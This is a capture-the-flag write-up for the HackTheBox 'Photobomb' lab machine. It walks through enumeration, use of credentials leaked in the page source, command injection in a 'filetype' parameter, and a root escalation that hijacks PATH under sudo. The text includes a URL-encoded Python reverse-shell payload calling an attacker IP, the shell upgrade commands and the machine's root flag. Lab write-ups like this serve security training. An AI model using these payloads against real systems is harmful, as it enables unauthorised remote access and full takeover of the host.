Make sure to Connect with the HackTheBox’s VPN before start
nmap
scan,directory
and Subdomain Enumeration FirstOpen ports
22 - ssh
80 - http
2. Let’s Enumerate the HTTP
Make sure to addphotobomb.htb
to your hosts using the Below command
3. On Inspecting the Source code we got something Interesting
http://pH0t0:b0Mb!@photobomb.htb/printer
Seems Like a Username and PasswordpH0t0:b0Mb!
4. Let’s try to log in with the Creds
We are Logged in : )
But It seems Nothing to be Interesting
5. Let’s Intercept the Request through burp
If you test each Parameter with code Execution commands, you’ll get to know that, we can inject commands onfiletype
which can be used to get Reverse shell
6. Let’s Start the Netcat server and use the payload
The payload to be Injected on thefiletype
parameter is mentioned below
Make sure to add your
IP address
and theport
used in netcat
%3bexport+RHOST%3d"10.10.14.35"%3bexport+RPORT%3d2929%3bpython3+-c+'import+sys,socket,os,pty%3bs%3dsocket.socket()%3bs.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))%3b[os.dup2(s.fileno(),fd)+for+fd+in+(0,1,2)]%3bpty.spawn("sh")'
7. Send the request with the payload infiletype
parameter
8. We got the reverse Connection. Before we start, let’s make Interactive shell using the below command
python3 -c "import pty;pty.spawn('/bin/bash')"
9. Now Let’s try to exploit the session to escalate root privilege
We can use linpeas to find a way to In
Linpeas is a popular tool used to search for possible paths to escalate privileges on Linux, Unix, and MacOS hosts.
Seems like we can runcleanup.sh
with root permission. So let’s try to view the contents ofcleanup.sh
for any possibilities to gain root privilege
cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb
# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
fi
# protect the priceless originals
find source_images -type f -name ‘*.jpg’ -exec chown root:root {} \;
10. Let’s addbash
in a file and let’s execute it with root permission
wizard@photobomb:~/photobomb$ echo bash > find
echo bash > find
wizard@photobomb:~/photobomb$ chmod +x find
chmod +x find
wizard@photobomb:~/photobomb$ sudo PATH=$PWD:$PATH /opt/cleanup.sh
sudo PATH=$PWD:$PATH /opt/cleanup.sh
root@photobomb:/home/wizard/photobomb# cat /root/root.txt
cat /root/root.txt
17efb291c8f2de7f3feae82386cb07c4
Flag: 17efb291c8f2de7f3feae82386cb07c4